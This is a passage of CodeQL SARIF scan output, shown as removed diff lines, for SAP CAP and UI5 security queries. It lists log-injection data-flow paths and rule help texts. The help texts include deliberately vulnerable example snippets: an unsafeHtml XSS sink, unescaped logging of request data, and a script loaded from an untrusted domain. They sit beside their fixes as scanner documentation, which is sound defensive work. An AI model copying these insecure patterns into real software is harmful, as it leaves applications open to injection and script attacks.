} - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - } ], - "newlineSequences" : [ "\r\n", "\n", "
", "
" ], - "columnKind" : "utf16CodeUnits", - "properties" : { - "codeqlConfigSummary" : { - "disableDefaultQueries" : false, - "queries" : [ { - "type" : "builtinSuite", - "uses" : "security-extended" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" - } ] - }, - "metricResults" : [ { - "rule" : { - "id" : "js/summary/lines-of-code", - "index" : 101, - "toolComponent" : { - "index" : 3 - } - }, - "ruleId" : "js/summary/lines-of-code", - "value" : 2973 - }, { - "rule" : { - "id" : "js/summary/lines-of-user-code", - "index" : 102, - "toolComponent" : { - "index" : 3 - } - }, - "ruleId" : "js/summary/lines-of-user-code", - "value" : 2973, - "baseline" : 0 - } ], - "semmle.formatSpecifier" : "sarif-latest" - } - } ] -}{ - "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", - "version" : "2.1.0", - "runs" : [ { - "tool" : { - "driver" : { - "name" : "CodeQL", - "organization" : "GitHub", - "semanticVersion" : "2.15.1", - "notifications" : [ { - "id" : "cli/expected-extracted-files/javascript", - "name" : "cli/expected-extracted-files/javascript", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "JavaScript" - } - }, { - "id" : "cli/expected-extracted-files/python", - "name" : "cli/expected-extracted-files/python", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "Python" - } - } ], - "rules" : [ ] - }, - "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: 